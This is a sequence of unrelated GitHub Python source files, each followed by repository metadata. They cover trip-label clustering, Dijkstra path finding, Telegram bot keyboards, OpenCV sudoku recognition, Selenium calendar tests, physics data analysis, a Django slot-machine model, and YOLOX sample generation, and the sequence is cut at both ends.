sec_sel_trips.append(second_round_trips[idx])
user_label_df = pd.DataFrame([trip['data']['user_input'] for trip in sec_sel_trips])
user_label_df = lp.map_labels(user_label_df)
# compute the sum of trips in this cluster
sum_trips = len(user_label_df)
# compute unique label sets and their probabilities in one cluster
# 'p' refers to probability
unique_labels = user_label_df.groupby(user_label_df.columns.tolist()).size().reset_index(name='uniqcount')
unique_labels['p'] = unique_labels.uniqcount / sum_trips
labels_columns = user_label_df.columns.to_list()
for i in range(len(unique_labels)):
one_set_labels = {}
# e.g. labels_only={'mode_confirm': 'pilot_ebike', 'purpose_confirm': 'work', 'replaced_mode': 'walk'}
labels_only = {column: unique_labels.iloc[i][column] for column in labels_columns}
one_set_labels["labels"] = labels_only
one_set_labels['p'] = unique_labels.iloc[i]['p']
# e.g. one_set_labels = {'labels': {'mode_confirm': 'walk', 'replaced_mode': 'walk', 'purpose_confirm': 'exercise'}, 'p': 1.0}
# in case append() method changes the dict, we use deepcopy here
labels_set = copy.deepcopy(one_set_labels)
sec_label_obj.append(labels_set)
# put user labels from the 2nd round into a dict, the key is the label from the 2nd round of clustering
#e.g. {'0': [{'labels': {'mode_confirm': 'bus', 'replaced_mode': 'bus', 'purpose_confirm': 'home'}, 'p': 1.0}]}
sec_round_labels[str(sl)] = sec_label_obj
sec_round_collect = copy.deepcopy(sec_round_labels)
# collect all user labels from the 2nd round, the key is to the label from the 1st round
# e.g. fitst_round_labels = {'0': [{'0': [{'labels': {'mode_confirm': 'drove_alone', 'purpose_confirm': 'work', 'replaced_mode': 'drove_alone'}, 'p': 1.0}]}]}
first_label_obj.append(sec_round_collect)
fitst_round_labels[str(fl)] = first_label_obj
# wrap up all labels
# e.g. all_labels = [{'first_label': [{'second_label': [{'labels': {'mode_confirm': 'shared_ride',
# 'purpose_confirm': 'home', 'replaced_mode': 'drove_alone'}, 'p': 1.0}]}]}]
all_labels = [fitst_round_labels]
# save all user labels
save_models('user_labels',all_labels,user)
# save models from the 2nd round of clustering
save_models('models',[model_coll],user)
# save location features of all bins
save_models('locations',[bin_loc_feat],user)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s',
level=logging.DEBUG)
main()
| e-mission/e-mission-server | emission/analysis/modelling/tour_model/build_save_model.py | build_save_model.py | py | 7,787 | python | en | code | 22 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "jsonpickle.dumps",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "emission.storage.timeseries.abstract_timeseries.TimeSeries.get_uuid_list",
"line_number": 48,
"usage_typ... |
15207404869 | # 最短距离算法
import networkx as nx
debug = False
start_node = ('start', -1) # 初始节点
end_node = ('end', -1) # 终止节点
def fmt_edges(points, max_score=1.):
"""将节点得分列表格式化成距离矩阵
:param points list[[left, right, score]]
:return edges [(node_id1, node_id2, score)]
:return nodes [(left, right)]
"""
points_dict = dict()
for i, j, score in points:
# 默认值为虚拟节点
points_dict.setdefault(i, [(-1, max_score)]).append((j, max_score - score))
edges, last_nodes = [], [start_node]
nodes = [start_node]
for left, points_score in points_dict.items():
curr_nodes = []
for right, score in points_score:
node = (left, right)
curr_nodes.append(node)
edges += init_edges(last_nodes, node, score)
nodes += curr_nodes
last_nodes = curr_nodes
# 终止节点
nodes.append(end_node)
if debug:
print('edges:', [edge[:2] for edge in edges if edge[0] != start_node])
edges += init_edges(last_nodes, end_node, 0.)
node_keys = {val: key for key, val in enumerate(nodes)}
edges = [(node_keys[f_node], node_keys[t_node], score) for f_node, t_node, score in edges]
return edges, nodes
def init_edges(last_nodes, point, score):
""""""
edges = []
for last in last_nodes:
if last[1] >= 0 and point[1] >= 0 and last[1] >= point[1]:
continue
edges.append((last, point, score))
return edges
def shortest_distance(edges, nodes, target=None, source=0):
"""最短距离算法
:return path list[(left, right)]
"""
if target is None:
target = len(nodes) - 1
G = nx.DiGraph()
G.add_weighted_edges_from(edges)
path = nx.dijkstra_path(G, source=source, target=target)
if debug:
print('shortest path: ', path)
path = [p for p in path if p not in set((source, target))]
path = [nodes[p] for p in path]
return path
if __name__ == '__main__':
debug = True
def test(points):
edges, nodes = fmt_edges(points)
path = shortest_distance(edges, nodes)
print(path)
print("-------")
points = [[0, 0, 0.5]]
test(points)
points = [[0, 0, 0.7], [0, 1, 0.1], [1, 0, 0.2], [1, 1, 0.6]]
test(points)
points = [[0, 0, 0.7], [0, 1, 0.1], [1, 0, 0.8], [1, 1, 0.6]]
test(points)
points = [[0, 0, 0.7], [1, 0, 0.1], [1, 1, 0.2], [2, 1, 0.8]]
test(points)
| ibbd-dev/python-ibbd-algo | ibbd_algo/shortest_distance.py | shortest_distance.py | py | 2,510 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "networkx.DiGraph",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "networkx.dijkstra_path",
"line_number": 63,
"usage_type": "call"
}
] |
19022803935 | from aiogram.types import (
InlineKeyboardMarkup,
InlineKeyboardButton,
ReplyKeyboardMarkup,
KeyboardButton,
)
from main import admins_id
from utils.db_api.schemas.table_db import session, Contest
kb = ReplyKeyboardMarkup(resize_keyboard=True)
kb.add(KeyboardButton("Добавить конкурс")).add(KeyboardButton("Отмена"))
kb_auth = ReplyKeyboardMarkup(resize_keyboard=True)
kb_auth.add(KeyboardButton("Авторизация по телефону", request_contact=True))
def genmarkup(data: list) -> InlineKeyboardMarkup:
markup = InlineKeyboardMarkup()
markup.row_width = 1
for i in data:
markup.add(InlineKeyboardButton(i[0], callback_data=f"con_{i[0]}"))
return markup
def to_pay(user_id: int, contest: str, skip: bool = False):
markup = InlineKeyboardMarkup()
markup.row_width = 1
contest_query = session.query(Contest).filter(Contest.name == contest).first()
if not (contest_query.winner):
if str(user_id) in admins_id:
markup.add(
InlineKeyboardButton(
"Выбрать победителя и закончить конкурс",
callback_data=f"win_{contest}",
)
)
else:
if not skip:
markup.add(
InlineKeyboardButton(
"Внести плату",
callback_data=f"pay_{contest}"
)
)
return markup
| A-Sergey/TelegramBot_Contest | keyboards/buttons.py | buttons.py | py | 1,574 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "aiogram.types.ReplyKeyboardMarkup",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "aiogram.types.KeyboardButton",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "aiogram.types.ReplyKeyboardMarkup",
"line_number": 14,
"usage_type": "call... |
3680795220 | import numpy as np
import cv2
import math
import subprocess
import shutil
import os
if not os.path.exists('/home/martin/fotos'):
os.makedirs('/home/martin/fotos')
image_sudoku_original = cv2.imread('/home/martin/sudoku/sudoku_recognition/testing3.jpeg')
cv2.imshow("Imagen original",image_sudoku_original)
cv2.waitKey(0)
img = cv2.GaussianBlur(image_sudoku_original,(5,5),0)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
cv2.imshow("Imagen en escala de grises",gray)
cv2.waitKey(0)
thresh1 = cv2.adaptiveThreshold(gray,255,0,1,19,2)
cv2.imshow("Imagen binarizada",thresh1)
cv2.waitKey(0)
contours, hierarchy = cv2.findContours(thresh1, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
#image_sudoku_candidates = image_sudoku_original.copy()
size_rectangle_max = 0;
biggest = None
max_area = 0
for i in contours:
area = cv2.contourArea(i)
if area > 100:
peri = cv2.arcLength(i, True)
approximation = cv2.approxPolyDP(i, 0.02 * peri, True)
if area > max_area and len(approximation) == 4:
biggest = approximation
max_area = area
for i in range(len(approximation)):
cv2.line(image_sudoku_original,
(biggest[(i % 4)][0][0], biggest[(i % 4)][0][1]),
(biggest[((i + 1) % 4)][0][0], biggest[((i + 1) % 4)][0][1]),
(255, 0, 0), 2)
cv2.imshow("Contorno principal",image_sudoku_original)
cv2.waitKey(0)
def rectify(h):
h = h.reshape((4, 2))
hnew = np.zeros((4, 2), dtype=np.float32)
add = h.sum(1)
hnew[0] = h[np.argmin(add)]
hnew[2] = h[np.argmax(add)]
diff = np.diff(h, axis=1)
hnew[1] = h[np.argmin(diff)]
hnew[3] = h[np.argmax(diff)]
return hnew
approx = rectify(biggest)
h = np.array([[0, 0], [449, 0], [449, 449], [0, 449]], np.float32)
retval = cv2.getPerspectiveTransform(approx, h)
warp_gray = cv2.warpPerspective(gray, retval, (450, 450))
h, w = warp_gray.shape[:2]
cv2.imshow("Imagen con cambio perspectiva",warp_gray)
cv2.waitKey(0)
var2 = cv2.adaptiveThreshold(warp_gray,255,0,1,19,2)
#close = cv2.morphologyEx(var2,cv2.MORPH_CLOSE,kernel1)
gauss = cv2.GaussianBlur(warp_gray, (5, 5), 0)
thresh = cv2.adaptiveThreshold(gauss,255,0,1,19,2)
kernel = np.ones((5, 5), np.uint8)
erosion = cv2.erode(thresh, kernel, iterations=1)
dilation = cv2.dilate(thresh, kernel, iterations=1)
closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)
#opening = cv2.morphologyEx(closing, cv2.MORPH_OPEN, kernel)
#
# close = cv2.morphologyEx(thresh,cv2.MORPH_CLOSE,kernel1)
# div = np.float32(warp_gray)/(close)
# res = np.uint8(cv2.normalize(div,div,0,255,cv2.NORM_MINMAX))
# res2 = cv2.cvtColor(res,cv2.COLOR_GRAY2BGR)
#img = cv2.GaussianBlur(var2,(5,5),0)
cv2.imshow("Imagen con Closing",closing)
cv2.waitKey(0)
# cv2.imshow("Imagen ultimo",thresh)
# cv2.waitKey(0)
contours, hierarchy = cv2.findContours(closing, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
def nroCuadrado(x, y,w,h):
width = 449
height = 449
x = x+(w/2)
y = y+(h/2)
widthxCuadrado = width / 9
heightxCuadrado = height / 9
for i in range(0, 9):
for j in range(0, 9):
proximoenAncho = (i + 1) * widthxCuadrado
actualenAncho = i * widthxCuadrado
proximoenAlto = (j + 1) * heightxCuadrado
actualenAlto = j * heightxCuadrado
if (x >= actualenAncho and x <= proximoenAncho and y >= actualenAlto and y <= proximoenAlto):
return i, j
sudoku_matrix = np.zeros((9,9))
squares = []
size_rectangle_max = 0;
biggest = None
max_area = 0
count = 0
area_total = 0
for i in contours:
area = cv2.contourArea(i)
if area > 100:
approximation = cv2.approxPolyDP(i, 0.04 * peri, True)
if len(approximation) == 4:
area = cv2.contourArea(approximation)
if area > 1000 and area <=3000:
squares.append(approximation)
area = cv2.contourArea(approximation)
area_total += area
count +=1
x, y, w, h = cv2.boundingRect(approximation)
#print("X: "+str(x)+" Y: "+str(y)+" W: "+str(w)+ " H: "+str(h))
cv2.rectangle(gauss, (y, x), (y + w, x + h), (0, 255, 0), 2)
new_image = gauss[x+7:x+h-7, y+7:y+w-7]
f, g = nroCuadrado(x, y,w,h)
var2 = cv2.adaptiveThreshold(new_image, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, \
cv2.THRESH_BINARY, 11, 2)
name = '/home/martin/fotos/var%s%d.jpg' % (f, g)
cv2.imwrite(name, var2)
non_black = cv2.countNonZero(var2)
total = var2.size
percent = (float(non_black)/float(total))*100
if percent > 90.0:
number = -1
else:
#number = predict.main(var2)
command = name
number = subprocess.check_output(['python', 'predict.py', command])
#var = 1
sudoku_matrix[f][g] = number
#print(number)
#cv2.imshow("Imagen perspectiva", var2)
#cv2.waitKey(0)
#name = '/home/lcorniglione/Documents/sudoku_recognition/fotos/var%s%d.jpg' %(f,g)
result = (area_total/count)
area_prom = math.sqrt(result)
print ("CANTIDAD RECONOCIDA:")
print (len(squares))
cant_squares = len(squares)
for i in range(0,9):
for j in range(0,9):
num = sudoku_matrix[i][j]
if num==(-1.0):
sudoku_matrix[i][j] = 0
if num==(0.0) and cant_squares<81:
im_number = gauss[i * (area_prom + 8):(i+1) * (area_prom + 8)][:,
j * (area_prom + 8):(j+1) * (area_prom + 8)]
var2 = cv2.adaptiveThreshold(im_number, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, \
cv2.THRESH_BINARY, 11, 2)
non_black = cv2.countNonZero(var2)
total = var2.size
percent = (float(non_black) / float(total)) * 100
name = '/home/martin/fotos/var%s%d.jpg' % (i, j)
cv2.imwrite(name, var2)
if percent > 85.0:
number = -1
else:
command = name
number = subprocess.check_output(['python', 'predict.py', command])
sudoku_matrix[i][j] = number
print ("FINALIZADO")
print (sudoku_matrix)
cv2.imshow("Imagen cuadrados", gauss)
cv2.waitKey(0)
shutil.rmtree('/home/martin/fotos')
| msampietro/sudoku_recognition | sudoku.py | sudoku.py | py | 6,869 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number":... |
16835981819 | import pytest
from backend.utils.assertions import assert_equals, assert_true
from backend.utils.helper import Helper
from front.data_for_tests.calender_data_for_tests import DataForTests
from front.pages.page import CalendarPage, CalendarConfiguration
@pytest.mark.usefixtures("setup", "test_config")
class TestCalender:
@pytest.fixture(scope="class")
def calendar_page(self, setup, test_config):
driver = setup
calendar_page = CalendarPage(driver)
calendar_page.open_url(Helper.get_config_value_by_name(test_config, ["calender", "url"]))
return calendar_page
@pytest.fixture(scope="class")
def switch_to_infinite_scroll_and_month_view(self, setup, calendar_page):
driver = setup
calendar_config = CalendarConfiguration(driver)
calendar_config.enable_infinite_scroll()
calendar_page.switch_view("Month")
@pytest.mark.parametrize("test_data", DataForTests.switch_to_infinite_scroll_and_month_view())
def test_switch_to_infinite_scroll_and_month_view(self, setup, test_data, calendar_page,
switch_to_infinite_scroll_and_month_view):
driver = setup
calendar_config = CalendarConfiguration(driver)
calendar_configuration = calendar_config.get_calendar_configuration()
assert_equals(calendar_configuration, test_data["configuration"])
calendar_page.verify_requested_view_checked(test_data["view_type"])
def test_create_events_check_element_count_increased(self, calendar_page,
switch_to_infinite_scroll_and_month_view):
event_resource_id = calendar_page.create_event()
assert_true(calendar_page.verify_event_was_created(event_resource_id),
"Error: After creating an event, Event not found!")
event_resource_id = calendar_page.create_event()
assert_true(calendar_page.verify_event_was_created(event_resource_id),
"Error: After creating an event, Event not found!")
def test_create_event_and_go_ahead_one_month_and_check_dom_decrease(self, setup, calendar_page,
switch_to_infinite_scroll_and_month_view):
event_resource_id = calendar_page.create_event()
calendar_page.navigation_forward(1)
assert_true(not calendar_page.verify_event_was_created(event_resource_id),
"Error: After creating an event and going one month forward, Event found!")
@pytest.mark.skip("This test have bug, so it will failed")
def test_create_event_change_month_and_check_event_still_exist(self, setup, calendar_page,
switch_to_infinite_scroll_and_month_view):
event_resource_id = calendar_page.create_event()
calendar_page.navigation_forward(1)
assert_true(not calendar_page.verify_event_was_created(event_resource_id),
"Error: After creating an event and going one month forward, Event found!")
calendar_page.navigation_backward(1)
assert_true(calendar_page.verify_event_was_created(event_resource_id),
"Error: After creating an event, change month and go back.Event not found!") | RivkaTestGit/MoonActive | front/tests/test_calender.py | test_calender.py | py | 3,347 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "front.pages.page.CalendarPage",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "backend.utils.helper.Helper.get_config_value_by_name",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "backend.utils.helper.Helper",
"line_number": 16,
"usag... |
42243061570 | import cant_utils as cu
import numpy as np
import matplotlib.pyplot as plt
import glob
import bead_util as bu
import tkinter
import tkinter.filedialog
import os, sys
from scipy.optimize import curve_fit
import bead_util as bu
from scipy.optimize import minimize_scalar as minimize
import pickle as pickle
import time
####################################################
####### Input parameters for data processing #######
TESTING = True
ddict = bu.load_dir_file( "/home/charles/opt_lev_analysis/scripts/dirfiles/dir_file_june2017.txt" )
#print ddict
pow_axis = 4
cant_axis = 1 # stage control axis
straighten_axis = 2 # axis with coherent drive to straighten
fit_pows = True
load_charge_cal = True
maxfiles = 1000
plot_forward_backward = False #True
#subtract_background = True
drivefreq = 18.0
cant_volts_to_um = 8.0 # 80 um / 10 V
#fig_title = ('Force vs. Cantilever Position: %s Hz, %s - %s, ' + bead) % (drivefreq, gas, num)
#dirs = [1,2,3,4,5,6,7]
dirs = [8,9,10,11,12,13,14,15,16]
tf_path = './trans_funcs/Hout_20160808.p'
step_cal_path = './calibrations/step_cal_20160808.p'
thermal_cal_file_path = '/data/20160808/bead1/1_5mbar_zcool_final.h5'
def poly2(x, a, b, c):
return a * (x - b)**2 + c
def proc_dir(d):
dv = ddict[d]
dir_obj = cu.Data_dir(dv[0], [0,0,dv[-1]], dv[1])
dir_obj.load_dir(cu.simple_loader, maxfiles = maxfiles)
amps = []
for fil_obj in dir_obj.fobjs:
fil_obj.psd()
stagestuff = fil_obj.get_stage_settings(axis=straighten_axis)
amp = stagestuff[2] * cant_volts_to_um
amps.append(amp)
uamps = np.unique(amps)
if len(uamps) > 1:
print('STUPIDITYERROR: Multiple dirve amplitudes in directory')
newlist = []
for i in [0,1,2]:
if i == straighten_axis:
newlist.append(uamps[0])
else:
newlist.append(0.0)
dir_obj.drive_amplitude = newlist
return dir_obj
dir_objs = list(map(proc_dir, dirs))
colors_yeay = bu.get_color_map( len(dir_objs) )
psds = {}
pows = {}
bpows = {}
for ind, obj in enumerate(dir_objs):
psd = []
col = colors_yeay[ind]
amp = obj.drive_amplitude[straighten_axis]
filcount = 0
for fobj in obj.fobjs:
filcount += 1
fobj.psd()
if not len(psd):
freqs = fobj.other_psd_freqs
psd = fobj.other_psds[pow_axis-3]
else:
psd += fobj.other_psds[pow_axis-3]
psd = psd / float(filcount)
psds[amp] = psd
ind = np.argmin(np.abs(freqs - drivefreq))
totpow = np.sum(psd[ind-1:ind+2])
pows[amp] = totpow
badind = int(ind*1.5)
totbadpow = np.sum(psd[badind-1:badind+2])
bpows[amp] = totbadpow
amps = list(pows.keys())
amps.sort()
powsarr = []
bpowsarr = []
for amp in amps:
powsarr.append(pows[amp])
bpowsarr.append(bpows[amp])
if fit_pows:
p0 = [1, 0, 0]
popt, pcov = curve_fit(poly2, amps, powsarr, p0 = p0, maxfev = 10000)
fitpoints = np.linspace(amps[0], amps[-1], 100)
fit = poly2(fitpoints, *popt)
plt.plot(amps, powsarr, 'o')
plt.plot(fitpoints, fit, color='r', linewidth=1.5)
title = 'Best fit straightening amplitude: %0.2g um' % popt[1]
plt.title(title)
else:
plt.plot(amps, powsarr)
plt.plot(amps, bpowsarr)
plt.show()
| charlesblakemore/opt_lev_analysis | scripts/general_analysis/not_yet_updated/straighten_cantilever_withpower.py | straighten_cantilever_withpower.py | py | 3,333 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "bead_util.load_dir_file",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "cant_utils.Data_dir",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "cant_utils.simple_loader",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_nam... |
20760678532 | from re import T
from django.db import models
from machine.computations.examples import victorious_payment
from django.contrib.postgres.fields import ArrayField
# Create your models here.
class Machine(models.Model):
def empty_list():
return list()
# identificar la maquina que estamos usando
name = models.CharField(max_length=200, blank=True)
payments = models.JSONField()
free_spins = ArrayField(
models.IntegerField(blank=True),
size=5,
default=empty_list
)
normal_reel = ArrayField(
models.CharField(max_length=200, blank=True),
size=5,
default=empty_list
)
bonus_reel = ArrayField(
models.CharField(max_length=200, blank=True),
size=5,
default=empty_list
)
visible = ArrayField(
models.IntegerField(blank=True),
size=5,
default=empty_list
)
multiplier = models.IntegerField(default=3)
# corregir:
# ver si se puede mejorar
roi = models.FloatField(default=0)
def payment(self, roll):
return victorious_payment(self, roll)
def save(self, *args, **kwargs):
self.roi += 0.01
super(Machine, self).save(*args, **kwargs)
def __str__(self) -> str:
return self.name
| montenegrop/casinoGames | machine/models.py | models.py | py | 1,286 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.models.Model",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "django.db.models.CharField",
"line_number": 15,
"usage_type": "call"
},
{
"api_name"... |
41240226723 | # Importar Librerias
import pandas as pd
import json
# Opening JSON file
f = open('orderbooks_05jul21.json')
print(f)
# Returns JSON object as a dictionary
orderbooks_data = json.load(f)
ob_data = orderbooks_data['bitfinex']
# Drop Keys with none values
ob_data = {i_key: i_value for i_key,i_value in ob_data.items() if i_value is not None}
# Convert to DataFrame and rearange columns
ob_data = {i_ob: pd.DataFrame(ob_data[i_ob])[['bid_size', 'bid', 'ask', 'ask_size']]
if ob_data[i_ob] is not None else None for i_ob in list(ob_data.keys())}
| if722399/Laboratorio-1-MySt- | dataa.py | dataa.py | py | 578 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 17,
"usage_type": "call"
}
] |
18200360642 | import json
import os
import random
import shutil
from predictor import get_predictor
from yolox.tracking_utils.timer import Timer
import cv2
import numpy as np
def get_gt_by_frame(bbox_file: str):
gtByFrames = {}
# convert to List[bboxes, List[int]]
with open(bbox_file) as f:
annot = json.load(f)
labels = annot['labels']
infos = annot['info']
frames_map = [int(u.split('_')[-1].split('.')[0]) for u in infos['url']]
for pIdx, player in enumerate(labels):
frames = player['data']['frames']
#group by frame
for frame in frames:
frame_idx = frames_map[frame['frame']]
if frame_idx not in gtByFrames:
gtByFrames[frame_idx] = [[], []]
gtByFrames[frame_idx][0].append(frame['points'] + [1])
gtByFrames[frame_idx][1].append(pIdx)
for k, v in gtByFrames.items():
gtByFrames[k] = (np.array(v[0]), np.array(v[1]))
return gtByFrames
def ensure_folder(path: str):
try:
os.makedirs(path)
except: pass
def remove_folder(path:str):
try:
shutil.rmtree(path)
except: pass
if __name__ == '__main__':
gt_labels = os.listdir('./input/bboxes')
detector = get_predictor()
OUTPUT_ROOT = './output'
remove_folder(OUTPUT_ROOT)
ensure_folder(OUTPUT_ROOT)
splits = ['train', 'val', 'test']
for split in splits:
ensure_folder(OUTPUT_ROOT + f'/{split}/negative')
ensure_folder(OUTPUT_ROOT + f'/{split}/positive')
for gt_label_file in gt_labels:
gt_bboxes = get_gt_by_frame(f'./input/bboxes/{gt_label_file}')
video_id = gt_label_file.split('.')[0]
print(video_id)
if not os.path.exists(f'./input/images/{video_id}'):
continue
# extract positive patches
for frame_idx, (player_bboxes, player_ids) in gt_bboxes.items():
img = cv2.imread(f'./input/images/{video_id}/{frame_idx}.jpg')
img_masked = img.copy()
for bbox in player_bboxes:
x1, y1, x2, y2, _ = bbox.astype(int)
img_masked[y1:y2, x1:x2] = 0
cv2.imwrite(OUTPUT_ROOT + '/masked.png', img_masked)
outputs, img_info = detector.inference(img_masked[:, :, :3], Timer())
output_results = outputs[0]
if output_results is None: break
imgH, imgW = img_info['height'], img_info['width']
# human_bboxes = []
output_results = output_results.cpu().numpy()
scores = output_results[:, 4] * output_results[:, 5]
human_bboxes = output_results[:, :4] # x1y1x2y2
remain_indx = scores > 0.6
scores = scores[remain_indx]
human_bboxes = human_bboxes[remain_indx]
img_size = (800, 1440)
scale = min(img_size[0] / float(imgH), img_size[1] / float(imgW))
human_bboxes /= scale
# negative samples
negative_samples = [(bIdx, b) for bIdx, b in enumerate(human_bboxes) if b.min() > 0]
negative_samples = random.sample(negative_samples, min(20, len(negative_samples)))
random.shuffle(negative_samples)
train_split_idx = int(len(negative_samples) * 0.7)
val_split_idx = int(len(negative_samples) * 0.8)
for idx, (bIdx, bbox) in enumerate(negative_samples):
split = 'train' if idx < train_split_idx else ('val' if idx < val_split_idx else 'test')
x1, y1, x2, y2 = bbox.astype(int)
cv2.imwrite(f'{OUTPUT_ROOT}/{split}/negative/{video_id}_{frame_idx}_{bIdx}.png', img[y1:y2, x1:x2])
positive_samples = list(zip(player_ids, player_bboxes))
random.shuffle(positive_samples)
train_split_idx = int(len(positive_samples) * 0.7)
val_split_idx = int(len(positive_samples) * 0.8)
for idx, (player_id, player_bboxe) in enumerate(positive_samples):
split = 'train' if idx < train_split_idx else ('val' if idx < val_split_idx else 'test')
x1, y1, x2, y2, _ = player_bboxe.astype(int)
x1 = max(x1, 0)
try:
cv2.imwrite(f'{OUTPUT_ROOT}/{split}/positive/{video_id}_{frame_idx}_{player_id}.png', img[y1:y2, x1:x2])
except:
print(f'{OUTPUT_ROOT}/{split}/positive/{video_id}_{frame_idx}_{player_id}.png', x1, y1, x2, y2)
| chenzhutian/nba-Player-classifier | generate_samples.py | generate_samples.py | py | 4,488 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "shutil.rmtree",
"line_number": ... |
22700582787 | import pathlib
import json
import numpy as np
import pandas as pd
from scipy.interpolate import SmoothBivariateSpline, UnivariateSpline
import matplotlib as mpl
import matplotlib.pyplot as plt
from .common import Timer, Tools
from .sim_ctr import RgbGrid
from .sim_reduce import Steps, ReduceModel
class SynthGrid:
POPT_PATH = 'rgb_calibr/Salaris-off_vary-both.json'
AMLT_KEY = 'ms2_mt1'
AMLT_MODEL = lambda x, a, b1, b2, c1: a + b1*x[0] + b2*x[0]**2 + c1*x[1]
OUT_MASS_LIST = [0.9, 1. , 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8]
OUT_FEH_LIST = [-0.4, -0.3, -0.2, -0.1, 0. , 0.1, 0.2, 0.3, 0.4]
OUT_MASS_MINI = [1. , 1.4, 1.8]
OUT_FEH_MINI = [-0.4, 0. , 0.4]
def __init__(self, aMLT_list: [float], mass_list: [float] = RgbGrid.MASS_LIST,
FeH_list: [float] = RgbGrid.FEH_LIST, **kwargs):
self.indir = pathlib.Path('rgb_grid')
assert self.indir.exists(), 'rgb_grid does not exist'
self.outdir = pathlib.Path('synth_grid')
self.outdir.mkdir(exist_ok=True)
popt_path = pathlib.Path(SynthGrid.POPT_PATH)
assert popt_path.exists(), 'popt_path does not exist'
with open(popt_path, 'r') as f:
popt_dict = json.load(f)
self.aMLT_popt = popt_dict[SynthGrid.AMLT_KEY]
self.aMLT_list = aMLT_list
self.mass_list = mass_list
self.FeH_list = FeH_list
self.kwargs = kwargs # Ybirth, Zbirth, Z_over_X_sun, YBBN
self.timer = Timer()
self()
def __call__(self):
self.extract_sim_data()
self.build_interps()
for mass in SynthGrid.OUT_MASS_LIST:
for FeH in SynthGrid.OUT_FEH_LIST:
aMLT_fit = SynthGrid.AMLT_MODEL([mass-1, FeH], *self.aMLT_popt)
self.synthesize_model(mass, FeH, aMLT_fit)
self.clear()
print(' > All models synthesized!', '@', self.timer(), flush=True)
def extract_sim_data(self):
shape = (len(self.aMLT_list), Steps.end+1,
len(self.mass_list), len(self.FeH_list))
self.existence = np.ones(shape[:1] + shape[2:], dtype=bool)
self.data_dict = {qty: np.zeros(shape) for qty in ReduceModel.QTY_LIST}
for k, aMLT in enumerate(self.aMLT_list):
for j, mass in enumerate(self.mass_list):
for i, FeH in enumerate(self.FeH_list):
Y, Z = RgbGrid.Y_Z_calc(FeH, **self.kwargs)
model = SynthModel(self, aMLT=aMLT, mass=mass, Z=Z, FeH=FeH)
if model.exists:
for qty in ReduceModel.QTY_LIST:
self.data_dict[qty][k, :, j, i] = model.data[qty]
else:
self.existence[k, j, i] = False
model.clear_data(); del model
def build_interps(self):
self.interp_dict = {}
for qty in ReduceModel.QTY_LIST:
self.interp_dict[qty] = [[None for step in range(Steps.end+1)]
for aMLT in self.aMLT_list]
for k in range(len(self.aMLT_list)):
for step in range(Steps.end+1):
self.interp_dict[qty][k][step] = SmoothBivariateSpline(
self.data_dict['star_mass'] [k, step][self.existence[k]],
self.data_dict['surface_[Fe/H]'][k, step][self.existence[k]],
self.data_dict[qty] [k, step][self.existence[k]], kx=2, ky=2)
def synthesize_model(self, mass: float, FeH: float, aMLT_fit: float):
Y, Z = RgbGrid.Y_Z_calc(FeH, **self.kwargs)
model_name = f'{mass:.2f}M_Z={Z:.4f}_FeH={FeH:+.2f}'
print(' > Synthesizing', model_name, '@', self.timer())
pred = {}; data = {}
for qty in ReduceModel.QTY_LIST:
pred[qty] = np.zeros((len(self.aMLT_list), Steps.end+1))
data[qty] = np.zeros(Steps.end+1)
for qty in ReduceModel.QTY_LIST:
for step in range(Steps.end+1):
for k, aMLT in enumerate(self.aMLT_list):
pred[qty] [k, step] = self.interp_dict[qty][k][step](mass, FeH)[0, 0]
data[qty][step] = UnivariateSpline(self.aMLT_list, pred[qty][:, step], k=1)(aMLT_fit)
if mass in SynthGrid.OUT_MASS_MINI and FeH in SynthGrid.OUT_FEH_MINI:
self._visualize_data(model_name, pred, data, aMLT_fit)
df = pd.DataFrame(data)
df.to_csv(self.outdir / f'{model_name}.csv')
pred.clear(); data.clear()
del df, pred, data
def _draw_curve(self, pred, data, ax, x, y, colors):
for k, aMLT in enumerate(self.aMLT_list):
ax.plot(pred[x][k], pred[y][k], '--', c=colors[k])
ax.plot(data[x], data[y], '-', c=colors[-1])
if x in ['Teff', 'log_g']: ax.invert_xaxis()
if y in ['Teff', 'log_g']: ax.invert_yaxis()
for step in range(Steps.end+1):
ax.plot([pred[x][k, step] for k in range(len(self.aMLT_list))],
[pred[y][k, step] for k in range(len(self.aMLT_list))],
ls='-', lw=0.5, c='lightgrey', zorder=-1)
for EEP in ['mid_PMS', 'ZAMS', 'mid_MS', 'TAMS', 'mid_SGB',
'pre_FDU', 'post_FDU', 'pre_RGBB', 'post_RGBB']:
idx = getattr(Steps, EEP)
